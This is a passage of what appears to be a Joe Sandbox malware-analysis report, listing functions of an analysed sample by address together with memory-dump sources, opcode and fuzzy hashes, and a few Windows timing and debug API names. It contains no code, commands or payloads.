                                                                                                                                                                                                                                                                                  • API String ID: 0-1422472067
                                                                                                                                                                                                                                                                                  • Opcode ID: 7bd6a443cfe3054721747132375e6f82add6f116c3b8a460bf02874ed9b0fa60
                                                                                                                                                                                                                                                                                  • Instruction ID: eba9565eb16d7f14c7e7851c9e84c5246c1d655de7ca451e142eef5edaf61974
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7bd6a443cfe3054721747132375e6f82add6f116c3b8a460bf02874ed9b0fa60
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5D428A75B09AC287EA15AB19AC513E8B7A0FF19B54FD44136CA4E03361DF3DE062CB60
                                                                                                                                                                                                                                                                                  Function 00007FF72F5B80D0 Relevance: 2.6, Strings: 2, Instructions: 125COMMON
                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.6840952422.00007FF72F5A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72F5A0000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6840916799.00007FF72F5A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841158411.00007FF72F689000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841235738.00007FF72F6BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F721000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F727000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F72C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841441464.00007FF72F72F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72f5a0000_kHslwiV2w6.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                  • String ID: @=}$d
                                                                                                                                                                                                                                                                                  • API String ID: 0-4053520297
                                                                                                                                                                                                                                                                                  • Opcode ID: 28531a6797bb50e98dfc9a6ae1b5f79929bc6386de9e3fae4bdb5bd213b841f6
                                                                                                                                                                                                                                                                                  • Instruction ID: 164aed5e4eb19e381f3ef8cddba71704b2f26d4adaada7beab14c9038627684f
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 28531a6797bb50e98dfc9a6ae1b5f79929bc6386de9e3fae4bdb5bd213b841f6
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9A413C61F19B8942ED05A7779D41AB4D192DF5E3D0E98D732D81D263D5EF3C70828910
                                                                                                                                                                                                                                                                                  Function 00007FF72F5D4390 Relevance: 2.2, Strings: 1, Instructions: 955COMMON
                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.6840952422.00007FF72F5A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72F5A0000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6840916799.00007FF72F5A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841158411.00007FF72F689000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841235738.00007FF72F6BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F721000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F727000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F72C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841441464.00007FF72F72F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72f5a0000_kHslwiV2w6.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                  • String ID: @=}
                                                                                                                                                                                                                                                                                  • API String ID: 0-3414626797
                                                                                                                                                                                                                                                                                  • Opcode ID: c44773253abac8336c1d72ee043a06f130369fffe4656ea49cf70b632554c591
                                                                                                                                                                                                                                                                                  • Instruction ID: 69c7c7652f7460d964aa47d3a1a802a0ffad53e4f996a131bb25fdb76a1fbe38
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c44773253abac8336c1d72ee043a06f130369fffe4656ea49cf70b632554c591
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4792CF65B1AAC686FA05AB26AD506F4E3A1FF49BC4FC84137D90E53761DF3CE4418B20
                                                                                                                                                                                                                                                                                  Function 00007FF72F5A8220 Relevance: 2.1, Strings: 1, Instructions: 834COMMON
                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.6840952422.00007FF72F5A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72F5A0000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6840916799.00007FF72F5A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841158411.00007FF72F689000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841235738.00007FF72F6BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F721000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F727000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F72C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841441464.00007FF72F72F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72f5a0000_kHslwiV2w6.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                  • String ID: @
                                                                                                                                                                                                                                                                                  • API String ID: 0-2766056989
                                                                                                                                                                                                                                                                                  • Opcode ID: 6e82094639824c14ab4293de4ec13a988e764ae228435d9a0dabbc53190a5c10
                                                                                                                                                                                                                                                                                  • Instruction ID: 7f2921c6bb336a635b0905310e8dec68970fc6aa9a08736738f88797fcd214a5
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6e82094639824c14ab4293de4ec13a988e764ae228435d9a0dabbc53190a5c10
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5462E5B3B16B4687E7089F29C855BAD76A1FB94B89F458035CA1D43788DF3CD924CB80
                                                                                                                                                                                                                                                                                  Function 00007FF72F5CFDD0 Relevance: 1.9, APIs: 1, Instructions: 439COMMON
                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.6840952422.00007FF72F5A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72F5A0000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6840916799.00007FF72F5A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841158411.00007FF72F689000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841235738.00007FF72F6BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F721000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F727000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F72C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841441464.00007FF72F72F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72f5a0000_kHslwiV2w6.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID: BreakCounterCreateDebugEventPerformanceQuery
                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                  • API String ID: 4239280443-0
                                                                                                                                                                                                                                                                                  • Opcode ID: 5491d3f8da2e797241490e3cda2db23de3b51a53647b4561e21f0ad4d068944b
                                                                                                                                                                                                                                                                                  • Instruction ID: b02d32c2ec47e05e413bccd92a9f32966a5a2570d32b949b2d783a840f0578d0
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5491d3f8da2e797241490e3cda2db23de3b51a53647b4561e21f0ad4d068944b
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: EE42E339E19BC286F700AB25AC802A5B3A5FF5D744FD05239D98C22765DF3CA1A1DB60
                                                                                                                                                                                                                                                                                  Function 00007FF72F5C5200 Relevance: 1.9, Strings: 1, Instructions: 629COMMON
                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.6840952422.00007FF72F5A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72F5A0000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6840916799.00007FF72F5A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841158411.00007FF72F689000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841235738.00007FF72F6BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F721000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F727000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F72C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841441464.00007FF72F72F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72f5a0000_kHslwiV2w6.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                  • String ID: @=}
                                                                                                                                                                                                                                                                                  • API String ID: 0-3414626797
                                                                                                                                                                                                                                                                                  • Opcode ID: bf5feb339442a0b79f58c974cad3d97fda4eb93d98ba6868e8e29d5f65b0f64f
                                                                                                                                                                                                                                                                                  • Instruction ID: e6cc5c761b28d4d12380594af8b982354028956e20b6aeb829ea42b2e18dff0d
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: bf5feb339442a0b79f58c974cad3d97fda4eb93d98ba6868e8e29d5f65b0f64f
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 675282B2B15BC681EE659F5AC8443A8A7A0FF19BA4F945235CE6D037D0DF7CD490CA20
                                                                                                                                                                                                                                                                                  Function 00007FF72F5D52E0 Relevance: 1.9, Strings: 1, Instructions: 619COMMON
                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.6840952422.00007FF72F5A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72F5A0000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6840916799.00007FF72F5A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841158411.00007FF72F689000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841235738.00007FF72F6BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F721000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F727000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F72C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841441464.00007FF72F72F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72f5a0000_kHslwiV2w6.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                  • String ID: @=}
                                                                                                                                                                                                                                                                                  • API String ID: 0-3414626797
                                                                                                                                                                                                                                                                                  • Opcode ID: b492ad88cf215fc62258aba1709844d5f27e408f569c58da072858a9a9ad3981
                                                                                                                                                                                                                                                                                  • Instruction ID: 3bfc70bf31a24d2e4d56dff2ab426a5663132d44f39b3f6358800c99faa062d8
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b492ad88cf215fc62258aba1709844d5f27e408f569c58da072858a9a9ad3981
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9642B236B1AB9686EB10DF66D8401EDB3A1FB48B98F940536DE5E17B98CE3CD441CB10
                                                                                                                                                                                                                                                                                  Function 00007FF72F5D5C20 Relevance: 1.9, Strings: 1, Instructions: 604COMMON
                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.6840952422.00007FF72F5A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72F5A0000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6840916799.00007FF72F5A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841158411.00007FF72F689000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841235738.00007FF72F6BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F721000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F727000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F72C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841441464.00007FF72F72F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72f5a0000_kHslwiV2w6.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                  • String ID: @=}
                                                                                                                                                                                                                                                                                  • API String ID: 0-3414626797
                                                                                                                                                                                                                                                                                  • Opcode ID: e52f450864030abe068b2e943946e6a8f68a43271c38fbddae6a16a12d04da61
                                                                                                                                                                                                                                                                                  • Instruction ID: b4a24387bdde1b14a1850fc3686503e986218e2fe17903792118481d58ce49c4
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e52f450864030abe068b2e943946e6a8f68a43271c38fbddae6a16a12d04da61
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5242B472F0A78586EB10EF66D9401FCA7A1EB14788F844537CE1D67788DE38E452CB60
                                                                                                                                                                                                                                                                                  Function 00007FF72F667BA0 Relevance: 1.8, APIs: 1, Instructions: 347COMMON
                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.6840952422.00007FF72F5A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72F5A0000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6840916799.00007FF72F5A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841158411.00007FF72F689000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841235738.00007FF72F6BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F721000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F727000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F72C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841441464.00007FF72F72F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72f5a0000_kHslwiV2w6.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID: Count64Tick
                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                  • API String ID: 1927824332-0
                                                                                                                                                                                                                                                                                  • Opcode ID: d7ae4015b6747c4f2a88c3bcd0e3919ab44728c05b91e0697f58cdc10b5d3ecf
                                                                                                                                                                                                                                                                                  • Instruction ID: 2fa73ad1289dbdc166bb58d2e6d205ba6a286608fa4ef7e560227fdf1d2c1e63
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d7ae4015b6747c4f2a88c3bcd0e3919ab44728c05b91e0697f58cdc10b5d3ecf
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 53D1A232B0868A86E714BF21CC446F9A7BAFB40B88F914539DE0D47695DF3CE841CB60
                                                                                                                                                                                                                                                                                  Function 00007FF72F5D35C0 Relevance: 1.8, Strings: 1, Instructions: 572COMMON
                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.6840952422.00007FF72F5A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72F5A0000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6840916799.00007FF72F5A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841158411.00007FF72F689000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841235738.00007FF72F6BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F721000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F727000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F72C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841441464.00007FF72F72F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72f5a0000_kHslwiV2w6.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                  • API String ID: 0-3916222277
                                                                                                                                                                                                                                                                                  • Opcode ID: cd09ef96d8f17e625544f5d09aacbfbf5b704350f56f2afae0a11c1b875b7772
                                                                                                                                                                                                                                                                                  • Instruction ID: 1ec37b865621fbd9aba3ab08e32b39924e9045511867dbba2a7bec812d01d093
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: cd09ef96d8f17e625544f5d09aacbfbf5b704350f56f2afae0a11c1b875b7772
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D6428336B1AAC686EA11AB16EC406F9B7A5FB057A4FC54236C96D437D4CF3CE450CB20
                                                                                                                                                                                                                                                                                  Function 00007FF72F5BE8A0 Relevance: 1.7, Strings: 1, Instructions: 440COMMON
                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.6840952422.00007FF72F5A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72F5A0000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6840916799.00007FF72F5A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841158411.00007FF72F689000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841235738.00007FF72F6BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F721000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F727000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F72C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841441464.00007FF72F72F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72f5a0000_kHslwiV2w6.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                  • String ID: ?
                                                                                                                                                                                                                                                                                  • API String ID: 0-1684325040
                                                                                                                                                                                                                                                                                  • Opcode ID: c36884137a1fbdc5629651c62ab30761a03d17dd0682946ebc7bc0764feb72a2
                                                                                                                                                                                                                                                                                  • Instruction ID: 312a007f7ff6c072d639b74a56f43787bbbd6e65ee0b44fa9f17e29b52a58e94
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c36884137a1fbdc5629651c62ab30761a03d17dd0682946ebc7bc0764feb72a2
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2512B132B08AC282EA10EB16E8447F9F3A5FB45B94F984635DA5E03798DF7CE445CB50
                                                                                                                                                                                                                                                                                  Function 00007FF72F5B0030 Relevance: 1.6, APIs: 1, Instructions: 55timeCOMMON
                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                  • GetSystemTimeAsFileTime.KERNEL32(?,?,?,00007FF72F5A4879,?,?,?,?,?,?,00007FF72F5A1EA0), ref: 00007FF72F5B00FC
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.6840952422.00007FF72F5A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72F5A0000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6840916799.00007FF72F5A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841158411.00007FF72F689000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841235738.00007FF72F6BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F721000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F727000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F72C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841441464.00007FF72F72F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72f5a0000_kHslwiV2w6.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID: Time$FileSystem
                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                  • API String ID: 2086374402-0
                                                                                                                                                                                                                                                                                  • Opcode ID: b5b44fb1cfa246b99875fe13986ad365462ea6fd88d0f75c6747b66273541516
                                                                                                                                                                                                                                                                                  • Instruction ID: 1ede376bc268eb84ed26d4508f03a6adf183b7895ad5a5df8e55538dd7bd241c
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b5b44fb1cfa246b99875fe13986ad365462ea6fd88d0f75c6747b66273541516
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 27212735F09B828BE750AF25EC416A9B2A4FB88344FD4413AE58C43761DF3DE4908F61
                                                                                                                                                                                                                                                                                  Function 00007FF72F5C44D0 Relevance: 1.6, Strings: 1, Instructions: 302COMMON
                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.6840952422.00007FF72F5A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72F5A0000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6840916799.00007FF72F5A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841158411.00007FF72F689000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841235738.00007FF72F6BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F721000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F727000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F72C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841441464.00007FF72F72F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72f5a0000_kHslwiV2w6.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID: CounterPerformanceQuery
                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                  • API String ID: 2783962273-3916222277
                                                                                                                                                                                                                                                                                  • Opcode ID: 0f497518f3011c90386f56ae0dd19987edc3a4fef3325d72aee3a22fc2e24883
